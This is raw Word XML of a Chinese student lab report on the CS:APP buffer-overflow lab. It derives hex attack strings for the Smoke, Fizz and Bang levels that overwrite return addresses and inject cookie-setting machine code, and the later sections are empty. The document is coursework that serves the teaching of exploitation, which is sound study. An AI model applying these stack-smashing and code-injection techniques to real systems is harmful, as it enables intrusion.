      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节。要覆盖返回地址，则</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8" w:rsidRPr="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串的大小应该是</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:t>0+8=48</w:t>
      </w:r>
      <w:r w:rsidR="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
      <w:r w:rsidR="00C72E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。最后</w:t>
      </w:r>
      <w:r w:rsidR="00C72E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00C72E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节为返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D002C8" w:rsidRDefault="00C72E0E" w:rsidP="00C72E0E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2001D4C7" wp14:editId="014C9995">
            <wp:extent cx="4927600" cy="10880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942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E1" w:rsidRDefault="00C72E0E" w:rsidP="00A558CD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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的反汇编代码得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的首地址，为</w:t>
      </w:r>
      <w:r w:rsidR="003071E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="003071E1">
        <w:t>401019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071E1" w:rsidRDefault="00C72E0E" w:rsidP="003071E1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06AB3A7A" wp14:editId="36040812">
            <wp:extent cx="5162550" cy="129473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3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E1" w:rsidRDefault="003071E1" w:rsidP="00A558CD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则</w:t>
      </w:r>
      <w:r w:rsidRPr="00D002C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应为</w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:t>19 10 40</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003071E1">
        <w:t xml:space="preserve"> 00 00 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003071E1">
        <w:t xml:space="preserve"> 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其他字节任意</w:t>
      </w:r>
      <w:r w:rsidR="0022049F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由此得到攻击字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022049F" w:rsidRDefault="0022049F" w:rsidP="0022049F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022049F" w:rsidRDefault="0022049F" w:rsidP="0022049F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022049F" w:rsidRDefault="0022049F" w:rsidP="0022049F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022049F" w:rsidRDefault="0022049F" w:rsidP="0022049F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003071E1" w:rsidRDefault="0022049F" w:rsidP="0022049F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t>19 10 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003849A6" w:rsidRPr="003E6724" w:rsidRDefault="00FF7501" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc49717522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Fizz的攻击与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37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 xml:space="preserve">bf 30 a9 9e 12 68 3b 10 40 00 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c3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1F47C0" w:rsidRDefault="001F47C0" w:rsidP="001F47C0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>10 34 68 55 00 00 00 00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8E68CA" w:rsidRDefault="008E68CA" w:rsidP="001F47C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个任务</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可知攻击字符串的长度为</w:t>
      </w:r>
      <w:r>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为跳转地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0D85" w:rsidRDefault="00D95739" w:rsidP="001F47C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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fizz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的反汇编代码可知，</w:t>
      </w:r>
      <w:r w:rsidR="005D7590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="005D7590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储于</w:t>
      </w:r>
      <w:r w:rsidR="005D7590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="005D7590">
        <w:t>205165(%rip)</w:t>
      </w:r>
      <w:r w:rsidR="005D7590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处，需要与第一个参数</w:t>
      </w:r>
      <w:r w:rsidR="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相等，而第一个参数存储于</w:t>
      </w:r>
      <w:r w:rsidR="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D95739" w:rsidRDefault="001F0D85" w:rsidP="001F0D85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10E25088" wp14:editId="5538257B">
            <wp:extent cx="5400675" cy="6438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5" w:rsidRDefault="001F0D85" w:rsidP="001F47C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由此可知，我们必须要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%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中。考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C12BC" w:rsidRDefault="002C12BC" w:rsidP="002C12BC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261C4C09" wp14:editId="5FB5B0B7">
            <wp:extent cx="2006600" cy="4108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588" cy="4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BC" w:rsidRDefault="002C12BC" w:rsidP="002C12BC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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译再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反汇编可得</w:t>
      </w:r>
      <w:r w:rsidR="000222FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入代码的二进制编码</w:t>
      </w:r>
      <w:r w:rsidR="000D7707">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C12BC" w:rsidRDefault="002C12BC" w:rsidP="002C12BC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48C56F" wp14:editId="7485C448">
            <wp:extent cx="3892550" cy="13378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913" cy="13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C0" w:rsidRDefault="00ED48C3" w:rsidP="00ED48C3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得到需要注入的代码</w:t>
      </w:r>
      <w:r>
        <w:t>bf 30 a9 9e 12 68 3b 10 40 00 c3</w:t>
      </w:r>
      <w:r w:rsidR="00F2507C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，处</w:t>
      </w:r>
      <w:r w:rsidR="000D7707">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于</w:t>
      </w:r>
      <w:r w:rsidR="00F2507C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串的开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760648" w:rsidRDefault="00760648" w:rsidP="00ED48C3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得到运行时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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的值，为</w:t>
      </w:r>
      <w:r w:rsidRPr="00760648">
        <w:t>0x55683410</w:t>
      </w:r>
      <w:r w:rsidRPr="00760648">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760648" w:rsidRDefault="00760648" w:rsidP="00760648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6C893BDA" wp14:editId="67C9FD66">
            <wp:extent cx="3937000" cy="143639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881" cy="14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48" w:rsidRDefault="0073378C" w:rsidP="00ED48C3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则将</w:t>
      </w:r>
      <w:r w:rsidRPr="0073378C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串的最后</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0073378C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="0073378C">
        <w:t>10 34 68 55</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073378C">
        <w:t xml:space="preserve"> 00 00 00 0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0073378C">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED48C3" w:rsidRDefault="00F2507C" w:rsidP="00ED48C3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拼接攻击代码和跳转位置得到最终的攻击字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2507C" w:rsidRDefault="00F2507C" w:rsidP="00F2507C">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bf 30 a9 9e 12 68 3b 10 40 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2507C" w:rsidRDefault="00F2507C" w:rsidP="00F2507C">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>c3 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2507C" w:rsidRDefault="00F2507C" w:rsidP="00F2507C">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2507C" w:rsidRDefault="00F2507C" w:rsidP="00F2507C">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2507C" w:rsidRDefault="00F2507C" w:rsidP="000D7707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t>10 34 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003849A6" w:rsidRPr="003E6724" w:rsidRDefault="00FF7501" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc49717522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Bang的攻击与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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="480"/>
      </w:pPr>
      <w:r>
        <w:t>49 c7 c1 30 a9 9e 12 4c 89 0c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="480"/>
      </w:pPr>
      <w:r>
        <w:t>25 a4 61 60 00 68 87 10 40 00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="480"/>
      </w:pPr>
      <w:r>
        <w:t>c3 00 00 00 00 00 00 00 00 00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="480"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00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lastRenderedPageBreak/>
        <w:t>10 34 68 55 00 00 00 00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5B0011">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务可知攻击字符串的长度为</w:t>
      </w:r>
      <w:r>
        <w:t>48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位，最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为跳转地址</w:t>
      </w:r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5B0011">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的反汇编代码可知，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>205165(%rip)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处，需要与</w:t>
      </w:r>
      <w:r w:rsidR="003050C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储于</w:t>
      </w:r>
      <w:r w:rsidR="003050C2" w:rsidRPr="003050C2">
        <w:t>0x205113(%rip)</w:t>
      </w:r>
      <w:r w:rsidR="003050C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（绝对地址为</w:t>
      </w:r>
      <w:r w:rsidR="00A021BD">
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="003050C2" w:rsidRPr="003050C2">
        <w:t>6061a4</w:t>
      </w:r>
      <w:r w:rsidR="003050C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003050C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidR="003050C2">
        <w:t>_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="005B0011" w:rsidP="00C844C7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75355EFF" wp14:editId="0D15AE81">
            <wp:extent cx="5219700" cy="5370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341" cy="5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由此可知，我们必须要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF2DFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r w:rsidR="00BF2DFD">
        <w:t>_value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="005B0011" w:rsidP="00C844C7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064F1961" wp14:editId="7E58C29D">
            <wp:extent cx="1981200" cy="563819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6523" cy="5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C7" w:rsidRDefault="00C844C7" w:rsidP="00C844C7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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译再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反汇编可得注入代码的二进制编码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="00546360" w:rsidP="00C844C7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="900"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="165D86EA" wp14:editId="60D8831F">
            <wp:extent cx="3854450" cy="1614192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079" cy="16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得到需要注入的代码</w:t>
      </w:r>
      <w:r w:rsidR="00546360">
        <w:t>49 c7 c1 30 a9 9e 12 4c 89 0c</w:t>
      </w:r>
      <w:r w:rsidR="00546360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546360">
        <w:t>25 a4 61 60 00 68 87 10 40 00</w:t>
      </w:r>
      <w:r w:rsidR="00546360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546360">
        <w:t>c3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，处于攻击字符串的开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="00F72721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个任务</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所得到的</w:t>
      </w:r>
      <w:r w:rsidR="00C844C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C844C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C844C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，为</w:t>
      </w:r>
      <w:r w:rsidR="00C844C7" w:rsidRPr="00760648">
        <w:t>0x55683410</w:t>
      </w:r>
      <w:r w:rsidR="00C844C7" w:rsidRPr="00760648">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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r w:rsidRPr="0073378C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击字符串的最后</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0073378C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="0073378C">
        <w:t>10 34 68 55</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073378C">
        <w:t xml:space="preserve"> 00 00 00 00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00BF2DF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拼接攻击代码和跳转位置得到最终的攻击字符串：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Chars="400" w:left="960"/>
      </w:pPr>
      <w:r>
        <w:t>49 c7 c1 30 a9 9e 12 4c 89 0c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Chars="400" w:left="960"/>
      </w:pPr>
      <w:r>
        <w:t>25 a4 61 60 00 68 87 10 40 00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Chars="400" w:left="960"/>
      </w:pPr>
      <w:r>
        <w:t>c3 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F72721" w:rsidRDefault="00F72721" w:rsidP="00F72721">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:left="960"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C844C7" w:rsidRDefault="00F72721" w:rsidP="00F72721">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="324" w:lineRule="auto"/>
        <w:ind w:leftChars="400" w:left="960"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>10 34 68 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003849A6" w:rsidRPr="003E6724" w:rsidRDefault="00FF7501" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc49717522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Boom的攻击与分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39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3849A6" w:rsidRPr="003E6724" w:rsidRDefault="00FF7501" w:rsidP="003849A6">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc49717522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 w:rsidR="003849A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nitro的攻击与分析</w:t>
      </w:r>
      <w:bookmarkStart w:id="41" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/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文本如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003849A6" w:rsidRDefault="003849A6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分析过程：</w:t>
      </w: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</w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc497175224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2"/>
    </w:p>
    <w:p w:rsidR="0040219A" w:rsidRDefault="00FF7501" w:rsidP="0040219A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc497175225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3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44" w:name="_Toc497175226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4"/>
    </w:p>
    <w:p w:rsidR="0040219A" w:rsidRDefault="0040219A" w:rsidP="0040219A"/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5" w:name="_Toc225579656"/>
      <w:bookmarkStart w:id="46" w:name="_Toc250450180"/>
    </w:p>
    <w:p w:rsidR="00FA7403" w:rsidRPr="002B3CAE" w:rsidRDefault="00E36173" w:rsidP="002B3CAE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc497175227"/>
      <w:r w:rsidRPr="002B3CAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考文献</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47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8"/>
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20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8D1" w:rsidRDefault="009D78D1">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009D78D1" w:rsidRDefault="009D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849A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8D1" w:rsidRDefault="009D78D1">
      <w:r>
